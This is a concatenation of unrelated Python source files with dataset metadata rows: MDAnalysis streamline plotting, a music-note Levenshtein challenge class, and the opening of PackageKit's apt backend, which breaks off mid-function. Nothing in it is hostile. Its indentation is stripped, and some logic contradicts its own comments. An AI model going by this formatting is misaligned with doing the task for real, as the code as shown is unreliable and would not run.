import mayavi, mayavi.mlab
#assign coordinate system limits and grid spacing:
x_lower,x_upper = -8.73, 1225.96
y_lower,y_upper = -12.58, 1224.34
z_lower,z_upper = -300, 300
grid_spacing_value = 20
x1, y1, z1 = MDAnalysis.visualization.streamlines_3D.generate_streamlines_3d('testing.gro',
'testing_filtered.xtc',xmin=x_lower,xmax=x_upper,ymin=y_lower,ymax=y_upper,zmin=z_lower,zmax=z_upper,
grid_spacing = grid_spacing_value, MDA_selection = 'name PO4',start_frame=2,end_frame=3,num_cores='maximum')
x,y,z = np.mgrid[x_lower:x_upper:x1.shape[0]*1j,y_lower:y_upper:y1.shape[1]*1j,z_lower:z_upper:z1.shape[
2]*1j]
#plot with mayavi:
fig = mayavi.mlab.figure(bgcolor=(1.0,1.0,1.0),size=(800,800),fgcolor=(0, 0, 0))
for z_value in np.arange(z_lower,z_upper,grid_spacing_value):
st = mayavi.mlab.flow(x,y,z,x1,y1,z1,line_width=1,seedtype='plane',integration_direction='both')
st.streamline_type = 'tube'
st.tube_filter.radius = 2
st.seed.widget.origin = np.array([ x_lower, y_upper, z_value])
st.seed.widget.point1 = np.array([ x_upper, y_upper, z_value])
st.seed.widget.point2 = np.array([ x_lower, y_lower, z_value])
st.seed.widget.resolution = int(x1.shape[0])
st.seed.widget.enabled = False
mayavi.mlab.axes(extent = [0,1200,0,1200,-300,300])
fig.scene.z_plus_view()
mayavi.mlab.savefig('test_streamplot_3D.png')
#more compelling examples can be produced for vesicles and other spherical systems
.. image:: test_streamplot_3D.png
'''
# work out the number of cores to use:
if num_cores == 'maximum':
num_cores = multiprocessing.cpu_count() # use all available cores
else:
num_cores = num_cores # use the value specified by the user
# assert isinstance(num_cores,(int,long)), "The number of specified cores must (of course) be an integer."
np.seterr(all='warn', over='raise')
parent_cube_dictionary = {} # collect all data from child processes here
def log_result_to_parent(process_dict):
parent_cube_dictionary.update(process_dict)
#step 1: produce tuple of cartesian coordinate limits for the first frame
#tuple_of_limits = determine_container_limits(coordinate_file_path = coordinate_file_path,trajectory_file_path =
# trajectory_file_path,buffer_value=buffer_value)
tuple_of_limits = (xmin, xmax, ymin, ymax, zmin, zmax)
#step 2: produce a suitable grid (will assume that grid size / container size does not vary during simulation--or
# at least not beyond the buffer limit, such that this grid can be used for all subsequent frames)
grid = produce_grid(tuple_of_limits=tuple_of_limits, grid_spacing=grid_spacing)
#step 3: split the grid into a dictionary of cube information that can be sent to each core for processing:
list_dictionaries_for_cores, total_cubes, num_sheets, delta_array_shape = split_grid(grid=grid, num_cores=num_cores)
#step 3b: produce required coordinate arrays on a single core to avoid making a universe object on each core:
start_frame_coord_array, end_frame_coord_array = produce_coordinate_arrays_single_process(coordinate_file_path,
trajectory_file_path,
MDA_selection,
start_frame, end_frame)
#step 4: per process work using the above grid data split
pool = multiprocessing.Pool(num_cores)
for sub_dictionary_of_cube_data in list_dictionaries_for_cores:
pool.apply_async(per_core_work, args=(
start_frame_coord_array, end_frame_coord_array, sub_dictionary_of_cube_data, MDA_selection, start_frame,
end_frame), callback=log_result_to_parent)
pool.close()
pool.join()
#so, at this stage the parent process now has a single dictionary with all the cube objects updated from all
# available cores
#the 3D streamplot (i.e, mayavi flow() function) will require separate 3D np arrays for dx,dy,dz
#the shape of each 3D array will unfortunately have to match the mgrid data structure (bit of a pain): (
# num_sheets - 1, num_sheets - 1, cubes_per_column)
cubes_per_sheet = int(float(total_cubes) / float(num_sheets - 1))
#produce dummy zero arrays for dx,dy,dz of the appropriate shape:
dx_array = np.zeros(delta_array_shape)
dy_array = np.zeros(delta_array_shape)
dz_array = np.zeros(delta_array_shape)
#now use the parent cube dictionary to correctly substitute in dx,dy,dz values
current_sheet = 0 # which is also the current row
y_index_current_sheet = 0 # sub row
z_index_current_column = 0 # column
total_cubes_current_sheet = 0
for cube_number in range(0, total_cubes):
dx_array[current_sheet, y_index_current_sheet, z_index_current_column] = parent_cube_dictionary[cube_number][
'dx']
dy_array[current_sheet, y_index_current_sheet, z_index_current_column] = parent_cube_dictionary[cube_number][
'dy']
dz_array[current_sheet, y_index_current_sheet, z_index_current_column] = parent_cube_dictionary[cube_number][
'dz']
z_index_current_column += 1
total_cubes_current_sheet += 1
if z_index_current_column == delta_array_shape[2]:
# done building current y-column so iterate y value and reset z
z_index_current_column = 0
y_index_current_sheet += 1
if y_index_current_sheet == delta_array_shape[1]: # current sheet is complete
current_sheet += 1
y_index_current_sheet = 0 # restart for new sheet
z_index_current_column = 0
total_cubes_current_sheet = 0
# now set velocity component values greater than a certain cutoff to 0,
# because they tend to reflect spurious values (i.e., PBC jumping)
dx_array[abs(dx_array) >= maximum_delta_magnitude] = 1.0
dy_array[abs(dy_array) >= maximum_delta_magnitude] = 1.0
dz_array[abs(dz_array) >= maximum_delta_magnitude] = 1.0
return (dx_array, dy_array, dz_array)
# if __name__ == '__main__': #execute the main control function only if this file is called as a top-level script
#will probably mostly use this for testing on a trajectory
| kain88-de/mdanalysis | package/MDAnalysis/visualization/streamlines_3D.py | Python | gpl-2.0 | 25,088 |
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 23 15:22:48 2011
@author: moritz
"""
__all__ = ["bslip"]
| MMaus/mutils | cmodels/__init__.py | Python | gpl-2.0 | 106 |
# Copyright (C) weslowskij
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import networkx
from Game import myStream, myNote
from mylibs.incDijksra import incDijkstra
from mylibs.myDict import MyDict
from Game.myKey import mykey
from Game.myJumpChordsAndSpeedTols import MyJumpChordsAndSpeedTols
import logging
from Game.myNoteMap import KnownChordPos
logger = logging.getLogger(__name__)
hdlr = logging.FileHandler(__name__ + '.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.NOTSET)
#logger.setLevel(logging.DEBUG)
#prof = hotshot.Profile(__name__ + ".prof")
costonedgedict = {}
chorddetection = myStream.ischordms
class MyLevenshteinChallenge(incDijkstra):
def __init__(self):
super(MyLevenshteinChallenge, self).__init__()
global costonedgedict
#if G == None:
self.G = networkx.MultiDiGraph()
self.drawposdict = MyDict()
self.drawposdict.defaultvalue=0
#else:
# self.G= G
self.innotes = myStream.MyStream()
self.echappei = []
self.nodes = {}
self.NoteMaps = {}
self.jumpToStates = MyJumpChordsAndSpeedTols()
#self.echappe=[]
#self.noNextInNoteMappings=[]
self.cut={}
self.nodefullexpanded = {}
self.target_not_reached = self.target_not_reached_and_do
self.errors = [0,0]
self.challengestartnote = None
#self.challengestartnote = self.jumpToStates.notes[0]
self.challengeendnote = None
self.challengeendchord = None
self.maxerror = [1,1]
self.maxerrorAtKnownnote={}
self.targets=[]
self.speedtol = 0.25
self.donelist = {}
self.retondone=False
self.verbosetimming=True
self.chain=[]
self.name = None
# to print values on knots..
costonedgedict = self.seen
def challengelen(self):
start =self.challengestartnote
if start is None:
start = self.challengestartchord.notes[0]
end = self.challengeendnote
if end is None:
end = self.challengeendchord.notes[0]
return end.pos - start.pos
# depricated ???
def knownStream(self):
start =self.challengestartnote
if start is None:
start = self.challengestartchord.notes[0]
end = self.challengeendnote
if end is None:
end = self.challengeendchord.notes[0]
ret = myStream.MyStream()
ret = ret.buildAllInChordRange(start,end)
return ret
"""
def errorcut(self,r):
m = r.currentMelodyRating
v = m.notenextMapping
logger.debug(str(self.name) + " " + "cutting error " + str(self.seen[r]))
if self.maxerror is not None:
#if self.seen[r]- r.rcost > self.maxerror:
#if self.seen[r] > self.maxerror:
if self.seen[r][0:2] > self.maxerrorAtKnownnote.get(v.knownChord, self.maxerror)[0:2]:
# just save Notes between start and endnote
#if v.knownote.pos >= self.challengestartnote.pos:
#self.cut[r]=r
logger.debug(str(self.name) + " " + "..cutted")
return True
logger.debug(str(self.name) + " " + "not cutted")
return False
pass
def target_reached(self, r):
#b = (v.innote.__repr__()) == self.target.__repr__()
#b = v.innote is self.target
m = r.currentMelodyRating
v = m.notenextMapping
if logger.isEnabledFor(logging.DEBUG) and r.lenlist > 1:
logger.debug(str(self.name) + " " + "checking targets for " + r.prettyprint())
# check targets
if len(self.targets) == 0:
self.targets =[(self.challengeendnote, self.challengeendchord)]
#logger.debug(str(self.name) + " and targets" + str(self.targets))
for tnote, tchord in self.targets:
logger.debug(str(self.name) + " " + "check " + str(tnote)+ tchord.prettyprint())
if v.knownChord == tnote or (v.knownChord == tchord and v.chordfull()):
#logger.info("target "+ str((tnote,tchord)) + "reached " + str( self.seen[r]- r.rcost) + " errors")
a = self.donelist.get((tnote,tchord),[])
a.append(r)
self.donelist[(tnote,tchord)]=a
if self.retondone == (tnote,tchord):
logger.debug(str(self.name) + " " + "target reached: ret and done")
return True
logger.debug(str(self.name) + " " + "target reached")
return False
#return v == self.target
"""
def target_not_reached_and_nothing(self):
pass
def target_not_reached_and_do(self):
pass
#print "check Challenge coding bug"
def update(self):
ret = super(MyLevenshteinChallenge,self).update()
logger.info(str(self.name) + " " + "myLevenshteinChallenge stats")
logger.info(str(self.name) + " " + "nodes " + str(len(self.nodes)))
logger.info(str(self.name) + " " + "noNextInNoteMappings " + str(len(self.noNextInNoteMappings)))
return ret
#def createKnownChordPos(self, I, K, parent, newplayedchords=None, good=True, appendKnownChord=True):
def createKnownChordPos(self, I, K, parent, good=True, appendKnownChord=True):
# create NoteMaps at most once
ret = KnownChordPos()
ret.innote = I
ret.knownChord = K
if hasattr(K, "myoffset"):
pass
#1/0
if parent is not None:
#ret.playedChordNotes = list(parent.playedChordNotes)
ret.innotesWrong = list(parent.innotesWrong)
ret.playedChordNotesgood = list(parent.playedChordNotesgood)
else:
pass
"""
if K:
ret.playedChordNotes = [K]
if good:
ret.playedChordNotesgood=[K]
else:
ret.innotesWrong=[I]
"""
#self.pos[ret]= ret.drawpos()
# always append ??
skip = False
for note in ret.playedChordNotesgood:
if note is K:
skip = True
if not skip and appendKnownChord:
if K:
#logger.debug("appending " + K.prettyprint() + " to " + str(id(ret.playedChordNotes)))
#ret.playedChordNotes.append(K)
if good:
if len(K.getChordtonesofType(I))>0:
ret.knownnote = K.getChordtonesofType(I)[0]
ret.playedChordNotesgood.append(ret.knownnote)
else:
ret.knownnote = None
ret.innotesWrong.append(I)
else:
ret.innotesWrong.append(I)
# mess needs to advance In but dont change playedchords..
#if newplayedchords:
# ret.playedChordNotesgood = list(newplayedchords)
# TODO copy innotesWrong too (Done??)
#ret.innotesWrong = list()
#ret2 = self.nodes.get(ret.myrepr())
if False:
ret2 = self.NoteMaps.get(ret.myrepr())
if ret2 is None:
#self.G.add_node(ret)
self.NoteMaps[ret.myrepr()] = ret
#self.pos[ret] = ret.drawpos()
return ret
else:
"""
if justnew:
print "justnew Notemaps\n"
return None
"""
return ret2
return ret
# more update because of incoming note
def add_note(self, aNote):
print("overwrite me!")
pass
# calculate it
#self.update()
# todo rewrite
def findsolution(self, atarget=None):
if atarget is None:
btarget = self.targets[-1]
if len(self.donelist.get(btarget,[]))==0:
#tmp = MyLevenshteinChallenge()
tmp = self.__class__()
tmp.maxerror=None
tmp.maxerrorAtKnownnote={}
tmp.retondone= btarget
tmp.targets = self.targets
tmp.speedtol=self.speedtol
# for drawing
tmp.challengestartnote = self.challengestartnote
tmp.jumpToStates = self.jumpToStates
tmp.name= "findsolution"
for v in self.innotes:
tmp.add_note(v)
tmp.update()
#tmp.draw()
return (tmp, tmp.donelist[btarget])
else:
return (self,self.donelist.get(btarget))
"""
if atarget is None:
btarget = self.targets[-1]
if len(self.donelist.get(btarget,[]))==0:
#tmp = MyLevenshteinChallenge()
tmp = self.__class__()
tmp.maxerror=None
tmp.maxerrorAtKnownnote={}
tmp.retondone= btarget
tmp.fringe = list(self.fringe)
tmp.targets = self.targets
tmp.seen = dict(self.seen)
tmp.nodes = dict(self.nodes)
tmp.speedtol=self.speedtol
# for drawing
tmp.challengestartnote = self.challengestartnote
tmp.pos=dict(self.pos)
tmp.drawposdict = dict(self.drawposdict)
tmp.name= "findsolution"
tmp.noNextInNoteMappings= NoNextInNoteSet(self.noNextInNoteMappings)
tmp.NoteMaps = dict(self.NoteMaps)
for v in self.cut.values():
d = self.seen[v]
heapq.heappush(tmp.fringe, (d, v))
tmp.update()
#tmp.draw()
return (tmp, tmp.donelist[btarget])
else:
return (self,self.donelist.get(btarget))
"""
def myadd_edge(self, v, w, **dicts):
Ipos = (v.innote.pos, v.knownChord.pos)
Kpos = (w.innote.pos, w.knownChord.pos)
ret = self.edges.get((Ipos, Kpos), None)
if ret is None:
ret = self.edges.get((Kpos, Ipos), None)
if ret is not None:
self.add_edge(v, w, dicts)
pass
def myadd_node(self,anode):
""" bad cause errors are permutating (really?)"""
"""
# no caching
# jump creates nodes witch arent optimal and then recached on despite better solutions
self.G.add_node(anode)
#self.nodes[anode.EqState()]=anode
self.pos[anode] = anode.currentMelodyRating.notenextMapping.drawpos(self.drawposdict)
return anode
"""
#if anode.currentMelodyRating.errorstr=="jump":
# print ""
# pass
# caching state Tree != dist tree
m1t = self.nodes.get(anode.EqState(),None)
if m1t is None:
self.G.add_node(anode)
self.nodes[anode.EqState()]=anode
#print "added state to tree"
m1t = anode
self.pos[m1t] = m1t.currentMelodyRating.notenextMapping.drawpos(self.drawposdict)
#logger.info(str(id(m1t)) +" currentMelodyRating.notenextMapping" + str(m1t.currentMelodyRating.notenextMapping.innote.pos))
#logger.info(str(id(m1t)) +" drawpos " + str(self.pos[m1t]))
else:
m1t = self.nodes.get(anode.EqState())
return m1t
#"""
def farestActive(self):
if len(self.noNextInNoteMappings.keys())>0:
return max(self.noNextInNoteMappings.keys(), key = lambda a: a.currentMelodyRating.notenextMapping.knownChord.pos)
return None
def longestActive(self):
if len(self.noNextInNoteMappings.keys())>0:
#return max(self.noNextInNoteMappings.keys(), key = lambda a: len(a.list))
return max(self.noNextInNoteMappings.keys(), key = lambda a: a.lenlist)
return None
def bestActive(self):
if len(self.noNextInNoteMappings.keys())>0:
#return max(self.noNextInNoteMappings.keys(), key = lambda a: (self.seen[a],len(a.list)))
return max(self.noNextInNoteMappings.keys(), key = lambda a: (self.seen[a],a.lenlist))
return None
if __name__ == '__main__':
print "Hallo"
a=mykey([2,4])
b=mykey([1,3])
print a+b
print a-b
print mykey([0,0,4])> mykey([0,0])
print mykey([2,0])> 2
exit(0)
myLevenstein = MyLevenshteinChallenge()
G = myLevenstein.G
midii = [20, 30, 40, 50, 60]
perm = [2, 3, 1, 4]
midik = [midii[0]]
for i in perm:
midik.append(midii[i])
#Error
midik[3] = 55
#midik.reverse()
K = []
I = []
i = 0
for x in range(len(midii)):
a = KnownChordPos()
ab = myNote.MyNote()
ab.midi = midii[x]
ab.myoffset = 100
ab.last = None
ab.next = None
ab.pos = i
if len(K) > 0:
ab.last = K[-1]
K[-1].next = ab
K.append(ab)
bb = myNote.MyNote()
bb.midi = midik[x]
bb.myoffset = 200
bb.last = None
bb.next = None
bb.pos = i
#print bb
if len(I) > 0:
bb.last = I[-1]
I[-1].next = bb
I.append(bb)
i = i + 1
s = KnownChordPos()
s.knownChord = K[0]
s.innote = I[0]
print s
#test= incDijkstra(G,s)
G.add_node(s)
#G.add_node("s")
test.pos[s] = [0, 0]
for x in I[1:len(I)]:
print "test.G.nodes ", test.G.nodes()
print "test.G.edges ", test.G.edges()
test.target = x
mytmp = x.next
x.next = x.next
print "test.target", test.target.__repr__(), "test.source", test.source.innote.__repr__()
print test.update()
x.next = mytmp
#networkx.draw(G,{s:[10,10],"s":[0,0]})
networkx.draw(G, test.pos)
networkx.draw_networkx(G, test.pos)#,with_labels=True, labels= test.elabels)
networkx.draw_networkx_edge_labels(G, test.pos, edge_labels=test.elabels)
#networkx.draw_networkx_edge_labels(G, test.pos)
#networkx.draw_networkx_edge_labels(G)
plt.show()
print I
print K
| olga-weslowskij/olga.weslowskij | Game/myLevenshteinChallenge.py | Python | gpl-2.0 | 14,955 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provides an apt backend to PackageKit
Copyright (C) 2007 Ali Sabil <ali.sabil@gmail.com>
Copyright (C) 2007 Tom Parker <palfrey@tevp.net>
Copyright (C) 2008-2009 Sebastian Heinlein <glatzor@ubuntu.com>
Copyright (C) 2012 Martin Pitt <martin.pitt@ubuntu.com>
Licensed under the GNU General Public License Version 2
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = "Sebastian Heinlein <devel@glatzor.de>"
import datetime
import errno
import fcntl
import gdbm
import glob
import gzip
import locale
import logging
import logging.handlers
import os
import pty
import re
import signal
import socket
import stat
import string
import subprocess
import sys
import time
import fnmatch
import apt
import apt.debfile
import apt_pkg
try:
import pkg_resources
except ImportError:
# no plugin support available
pkg_resources = None
from packagekit.backend import (PackageKitBaseBackend, format_string)
from packagekit import enums
logging.basicConfig(format="%(levelname)s:%(message)s")
pklog = logging.getLogger("PackageKitBackend")
pklog.setLevel(logging.NOTSET)
try:
_syslog = logging.handlers.SysLogHandler("/dev/log",
logging.handlers.SysLogHandler.LOG_DAEMON)
formatter = logging.Formatter('PackageKit: %(levelname)s: %(message)s')
_syslog.setFormatter(formatter)
pklog.addHandler(_syslog)
except:
pass
# Xapian database is optionally used to speed up package description search
XAPIAN_DB_PATH = os.environ.get("AXI_DB_PATH", "/var/lib/apt-xapian-index")
XAPIAN_DB = XAPIAN_DB_PATH + "/index"
XAPIAN_DB_VALUES = XAPIAN_DB_PATH + "/values"
XAPIAN_SUPPORT = False
try:
import xapian
except ImportError:
pass
else:
if os.access(XAPIAN_DB, os.R_OK):
pklog.debug("Use XAPIAN for the search")
XAPIAN_SUPPORT = True
# SoftwareProperties is required to proivde information about repositories
try:
import softwareproperties.SoftwareProperties
except ImportError:
REPOS_SUPPORT = False
else:
REPOS_SUPPORT = True
# Check if update-manager-core is installed to get aware of the
# latest distro releases
try:
from UpdateManager.Core.MetaRelease import MetaReleaseCore
except ImportError:
META_RELEASE_SUPPORT = False
else:
META_RELEASE_SUPPORT = True
# Set a timeout for the changelog download
socket.setdefaulttimeout(2)
# Required for daemon mode
os.putenv("PATH",
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")
# Map Debian sections to the PackageKit group name space
SECTION_GROUP_MAP = {
"admin" :enums.GROUP_ADMIN_TOOLS,
"base" :enums.GROUP_SYSTEM,
"comm" :enums.GROUP_COMMUNICATION,
"devel" :enums.GROUP_PROGRAMMING,
"doc" :enums.GROUP_DOCUMENTATION,
"editors" :enums.GROUP_PUBLISHING,
"electronics" :enums.GROUP_ELECTRONICS,
"embedded" :enums.GROUP_SYSTEM,
"games" :enums.GROUP_GAMES,
"gnome" :enums.GROUP_DESKTOP_GNOME,
"graphics" :enums.GROUP_GRAPHICS,
"hamradio" :enums.GROUP_COMMUNICATION,
"interpreters" :enums.GROUP_PROGRAMMING,
"kde" :enums.GROUP_DESKTOP_KDE,
"libdevel" :enums.GROUP_PROGRAMMING,
"libs" :enums.GROUP_SYSTEM,
"mail" :enums.GROUP_INTERNET,
"math" :enums.GROUP_SCIENCE,
"misc" :enums.GROUP_OTHER,
"net" :enums.GROUP_NETWORK,
"news" :enums.GROUP_INTERNET,
"oldlibs" :enums.GROUP_LEGACY,
"otherosfs" :enums.GROUP_SYSTEM,
"perl" :enums.GROUP_PROGRAMMING,
"python" :enums.GROUP_PROGRAMMING,
"science" :enums.GROUP_SCIENCE,
"shells" :enums.GROUP_SYSTEM,
"sound" :enums.GROUP_MULTIMEDIA,
"tex" :enums.GROUP_PUBLISHING,
"text" :enums.GROUP_PUBLISHING,
"utils" :enums.GROUP_ACCESSORIES,
"web" :enums.GROUP_INTERNET,
"x11" :enums.GROUP_DESKTOP_OTHER,
"unknown" :enums.GROUP_UNKNOWN,
"alien" :enums.GROUP_UNKNOWN,
"translations" :enums.GROUP_LOCALIZATION,
"metapackages" :enums.GROUP_COLLECTIONS,
}
# Regular expressions to detect bug numbers in changelogs according to the
# Debian Policy Chapter 4.4. For details see the footnote 16:
# http://www.debian.org/doc/debian-policy/footnotes.html#f16
MATCH_BUG_CLOSES_DEBIAN=r"closes:\s*(?:bug)?\#?\s?\d+(?:,\s*(?:bug)?\#?\s?\d+)*"
MATCH_BUG_NUMBERS=r"\#?\s?(\d+)"
# URL pointing to a bug in the Debian bug tracker
HREF_BUG_DEBIAN="http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%s"
MATCH_BUG_CLOSES_UBUNTU = r"lp:\s+\#\d+(?:,\s*\#\d+)*"
HREF_BUG_UBUNTU = "https://bugs.launchpad.net/bugs/%s"
# Regular expression to find cve references
MATCH_CVE="CVE-\d{4}-\d{4}"
HREF_CVE="http://web.nvd.nist.gov/view/vuln/detail?vulnId=%s"
SYNAPTIC_PIN_FILE = "/var/lib/synaptic/preferences"
# After the given amount of seconds without any updates on the console or
# progress kill the installation
TIMEOUT_IDLE_INSTALLATION = 10 * 60 * 10000
# Required to get translated descriptions
try:
locale.setlocale(locale.LC_ALL, "")
except locale.Error:
pklog.debug("Failed to unset LC_ALL")
# Required to parse RFC822 time stamps
try:
locale.setlocale(locale.LC_TIME, "C")
except locale.Error:
pklog.debug("Failed to unset LC_TIME")
def catch_pkerror(func):
"""Decorator to catch a backend error and report
it correctly to the daemon.
"""
def _catch_error(*args, **kwargs):
try:
return func(*args, **kwargs)
except PKError as error:
backend = args[0]
backend.error(error.enum, error.msg, error.exit)
return _catch_error
def lock_cache(func):
"""Lock the system package cache before excuting the decorated function and
release the lock afterwards.
"""
def _locked_cache(*args, **kwargs):
backend = args[0]
backend.status(enums.STATUS_WAITING_FOR_LOCK)
while True:
try:
# see if the lock for the download dir can be acquired
# (work around bug in python-apt/apps that call _fetchArchives)
lockfile = apt_pkg.config.find_dir("Dir::Cache::Archives") + \
"lock"
lock = apt_pkg.get_lock(lockfile)
if lock < 0:
raise SystemError("failed to lock '%s'" % lockfile)
else:
os.close(lock)
# then lock the main package system
apt_pkg.pkgsystem_lock()
except SystemError:
time.sleep(3)
else:
break
try:
func(*args, **kwargs)
finally:
backend._unlock_cache()
return _locked_cache
class PKError(Exception):
def __init__(self, enum, msg, exit=True):
self.enum = enum
self.msg = msg
self.exit = exit
def __str__(self):
return "%s: %s" % (self.enum, self.msg)
class PackageKitOpProgress(apt.progress.base.OpProgress):
"""Handle the cache opening progress."""
def __init__(self, backend, start=0, end=100, progress=True):
self._backend = backend
apt.progress.base.OpProgress.__init__(self)
self.steps = []
for val in [0.12, 0.25, 0.50, 0.75, 1.00]:
step = start + (end - start) * val
self.steps.append(step)
self.pstart = float(start)
self.pend = self.steps.pop(0)
self.pprev = None
self.show_progress = progress
# OpProgress callbacks
def update(self, percent=None):
if percent is None:
return
progress = int(self.pstart + percent / 100 * (self.pend - self.pstart))
if self.show_progress == True and self.pprev < progress:
self._backend.percentage(progress)
self.pprev = progress
def done(self):
self.pstart = self.pend
try:
self.pend = self.steps.pop(0)
except:
pklog.warning("An additional step to open the cache is required")
class PackageKitAcquireProgress(apt.progress.base.AcquireProgress):
"""Handle the package download progress.
TODO: Add a progress for Updating the cache.
"""
def __init__(self, backend, start=0, end=100):
self._backend = backend
apt.progress.base.AcquireProgress.__init__(self)
self.start_progress = start
self.end_progress = end
self.last_progress = None
self.last_sub_progress = None
self.package_states = {}
self.media_change_required = None
def pulse(self, owner):
#TODO: port to pulse(owner)
percent = self.current_bytes * 100.0 / self.total_bytes
progress = int(self.start_progress + percent / 100 *
(self.end_progress - self.start_progress))
# A backwards running progress is reported as a not available progress
if self.last_progress > progress:
self._backend.percentage()
else:
self._backend.percentage(progress)
self.last_progress = progress
for worker in owner.workers:
if not worker.current_item or not worker.total_size:
continue
item_id = "%s;;;" % worker.current_item.shortdesc
item_percent = worker.current_size * 100 / worker.total_size
self._backend.item_progress(item_id, item_percent)
return True
def fetch(self, item):
info = enums.INFO_DOWNLOADING
try:
pkg = self._backend._cache[item.shortdesc]
except:
self._backend.package("%s;;;" % item.shortdesc, info, "")
else:
self._backend._emit_package(pkg, info)
def start(self):
self._backend.status(enums.STATUS_DOWNLOAD)
self._backend.allow_cancel(True)
def stop(self):
self._backend.percentage(self.end_progress)
self._backend.allow_cancel(False)
def media_change(self, medium, drive):
#FIXME: Perhaps use gudev to show a nicer drive name
self._backend.media_change_required(enums.MEDIA_TYPE_DISC, medium,
drive)
self.media_change_required = medium, drive
return False
class PackageKitAcquireRepoProgress(PackageKitAcquireProgress):
"""Handle the download of of repository information."""
def pulse(self, owner):
self._backend.percentage(None)
#TODO: Emit repositories here
#for worker in owner.workers:
# if not worker.current_item or not worker.total_size:
# continue
# item_id = "%s;;;" % worker.current_item.shortdesc
# item_percent = worker.current_size * 100 / worker.total_size
# self._backend.item_progress(item_id, item_percent)
return True
def fetch(self, item):
pass
def start(self):
self._backend.status(enums.STATUS_DOWNLOAD_REPOSITORY)
self._backend.allow_cancel(True)
class PackageKitInstallProgress(apt.progress.base.InstallProgress):
"""Handle the installation and removal process."""
def __init__(self, backend, start=0, end=100):
apt.progress.base.InstallProgress.__init__(self)
self._backend = backend
self.pstart = start
self.pend = end
self.pprev = None
self.last_activity = None
self.conffile_prompts = set()
# insanly long timeout to be able to kill hanging maintainer scripts
self.start_time = None
self.output = ""
self.master_fd = None
self.child_pid = None
self.last_pkg = None
self.last_item_percentage = 0
def status_change(self, pkg_name, percent, status):
"""Callback for APT status updates."""
self.last_activity = time.time()
progress = self.pstart + percent / 100 * (self.pend - self.pstart)
if self.pprev < progress:
self._backend.percentage(int(progress))
self.pprev = progress
# INSTALL/UPDATE lifecycle (taken from aptcc)
# - Starts:
# - "Running dpkg"
# - Loops:
# - "Installing pkg" (0%)
# - "Preparing pkg" (25%)
# - "Unpacking pkg" (50%)
# - "Preparing to configure pkg" (75%)
# - Some packages have:
# - "Runnung post-installation"
# - "Running dpkg"
# - Loops:
# - "Configuring pkg" (0%)
# - Sometimes "Configuring pkg" (+25%)
# - "Installed pkg"
# - Afterwards:
# - "Running post-installation"
#
# REMOVING lifecylce
# - Starts:
# - "Running dpkg"
# - loops:
# - "Removing pkg" (25%)
# - "Preparing for removal" (50%)
# - "Removing pkg" (75%)
# - "Removed pkg" (100%)
# - Afterwards:
# - "Running post-installation"
# Emit a Package signal for the currently processed package
if status.startswith("Preparing"):
item_percentage = self.last_item_percentage + 25
info = enums.INFO_PREPARING
elif status.startswith("Installing"):
item_percentage = 0
info = enums.INFO_INSTALLING
elif status.startswith("Installed"):
item_percentage = 100
info = enums.INFO_FINISHED
elif status.startswith("Configuring"):
if self.last_item_percentage >= 100:
item_percentage = 0
item_percentage = self.last_item_percentage + 25
info = enums.INFO_INSTALLING
elif status.startswith("Removing"):
item_percentage = self.last_item_percentage + 25
info = enums.INFO_REMOVING
elif status.startswith("Removed"):
item_percentage = 100
info = enums.INFO_FINISHED
elif status.startswith("Completely removing"):
item_percentage = self.last_item_percentage + 25
info = enums.INFO_REMOVING
elif status.startswith("Completely removed"):
item_percentage = 100
info = enums.INFO_FINISHED
elif status.startswith("Unpacking"):
item_percentage = 50
info = enums.INFO_DECOMPRESSING
elif status.startswith("Noting disappearance of"):
item_percentage = self.last_item_percentage
info = enums.INFO_UNKNOWN
elif status.startswith("Running"):
item_percentage = self.last_item_percentage
info = enums.INFO_CLEANUP
else:
item_percentage = self.last_item_percentage
info = enums.INFO_UNKNOWN
try:
pkg = self._backend._cache[pkg_name]
except KeyError:
# Emit a fake package
id = "%s;;;" % pkg_name
self._backend.package(id, info, "")
self._backend.item_progress(id, item_percentage)
else:
# Always use the candidate - except for removals
self._backend._emit_package(pkg, info, not pkg.marked_delete)
if pkg.marked_delete:
version = pkg.installed
else:
version = pkg.candidate
id = self._backend._get_id_from_version(version)
self._backend.item_progress(id, item_percentage)
self.last_pkg = pkg_name
self.last_item_percentage = item_percentage
def processing(self, pkg_name, status):
"""Callback for dpkg status updates."""
if status == "install":
info = enums.INFO_INSTALLING
elif status == "configure":
info = enums.INFO_INSTALLING
elif status == "remove":
info = enums.INFO_REMOVING
elif status == "purge":
info = enums.INFO_PURGING
elif status == "disappear":
info = enums.INFO_CLEANINGUP
elif status == "upgrade":
info = enums.INFO_UPDATING
elif status == "trigproc":
info = enums.INFO_CLEANINGUP
else:
info = enums.INFO_UNKNOWN
self._backend.package("%s;;;" % pkg_name, info, "")
def start_update(self):
# The apt system lock was set by _lock_cache() before
self._backend._unlock_cache()
self._backend.status(enums.STATUS_COMMIT)
self.last_activity = time.time()
self.start_time = time.time()
def fork(self):
pklog.debug("fork()")
(pid, self.master_fd) = pty.fork()
if pid != 0:
fcntl.fcntl(self.master_fd, fcntl.F_SETFL, os.O_NONBLOCK)
else:
def interrupt_handler(signum, frame):
# Exit the child immediately if we receive the interrupt signal
# or a Ctrl+C - to avoid that atexit would be called
os._exit(apt_pkg.PackageManager.RESULT_FAILED)
# Restore the exception handler to avoid catches by apport
sys.excepthook = sys.__excepthook__
signal.signal(signal.SIGINT, interrupt_handler)
# Avoid questions as far as possible
os.environ["APT_LISTCHANGES_FRONTEND"] = "none"
os.environ["APT_LISTBUGS_FRONTEND"] = "none"
# Check if debconf communication can be piped to the client
frontend_socket = os.getenv("FRONTEND_SOCKET", None)
if frontend_socket:
